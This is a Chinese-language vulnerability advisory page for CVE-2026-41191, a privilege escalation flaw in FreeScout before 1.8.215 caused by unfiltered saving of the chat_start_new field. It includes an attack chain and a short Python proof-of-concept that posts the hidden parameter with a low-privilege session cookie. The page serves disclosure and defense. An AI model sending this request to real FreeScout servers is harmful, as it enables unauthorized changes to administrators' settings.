IPBUF安全漏洞报告
English
CVE-2026-41191 CVSS 7.1 高危

CVE-2026-41191 FreeScout权限提升漏洞

披露日期: 2026-04-21

漏洞信息

漏洞编号
CVE-2026-41191
漏洞类型
权限提升
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
FreeScout

相关标签

权限提升FreeScoutWeb安全访问控制

漏洞概述

FreeScout是一款流行的自托管帮助台软件。在1.8.215版本之前,系统存在权限提升漏洞。具体原因是`MailboxesController::updateSave()`方法未对`chat_start_new`字段进行有效过滤,导致该字段在允许列表之外被保存。仅拥有邮箱“sig”权限的用户,虽然前端界面受限,但可通过直接发送POST请求修改隐藏的邮箱范围聊天设置,从而实施越权操作。

技术细节

该漏洞的根本原因在于FreeScout后端控制器在处理模型更新时,缺乏对特定字段的细粒度权限控制。在`MailboxesController::updateSave()`方法中,系统采用了批量赋值的方式处理用户提交的数据,但未严格限制仅允许前端显示的字段被修改。根据描述,`chat_start_new`是一个敏感的邮箱级配置,本应仅授权给高权限管理员修改。然而,后端逻辑允许任何拥有基本邮箱访问权限(如签名权限`sig`)的用户通过API直接提交该参数。攻击者利用这一缺陷,首先需要登录并获取有效的会话令牌。随后,通过Burp Suite或Python脚本等工具,构造发送至`/mailboxes/{id}/update-save`接口的POST请求,在请求体中追加`chat_start_new`参数。由于服务器端未校验该用户是否有权修改此特定配置,数据被直接持久化到数据库,导致全局聊天设置被篡改,构成了严重的权限提升风险。

攻击链分析

STEP 1
步骤1
攻击者注册或获取一个仅拥有邮箱签名权限的账户。
STEP 2
步骤2
攻击者分析网络请求,确定邮箱设置更新的API端点。
STEP 3
步骤3
攻击者构造包含`chat_start_new`参数的恶意POST请求包。
STEP 4
步骤4
服务器端接收请求,未校验权限直接保存参数,导致配置被篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "https://example.com/mailboxes/1/update-save" # Attacker's session cookie (User with 'sig' permission) cookies = { "freescout_session": "attacker_session_cookie_here" } headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } # Vulnerable payload: Injecting hidden parameter # 'chat_start_new' controls chat settings and is not exposed to low-priv users in UI payload = { "name": "Support Mailbox", "email": "[email protected]", "signature": "<p>Authorized Signature</p>", "chat_start_new": "1" # Malicious parameter injection } response = requests.post(target_url, data=payload, cookies=cookies, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Hidden settings potentially updated.") else: print(f"[-] Failed. Status code: {response.status_code}")

影响范围

FreeScout < 1.8.215

防御指南

临时缓解措施
如果无法立即升级,建议限制非受信任用户的网络访问,并监控邮箱配置变更日志以检测异常修改。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表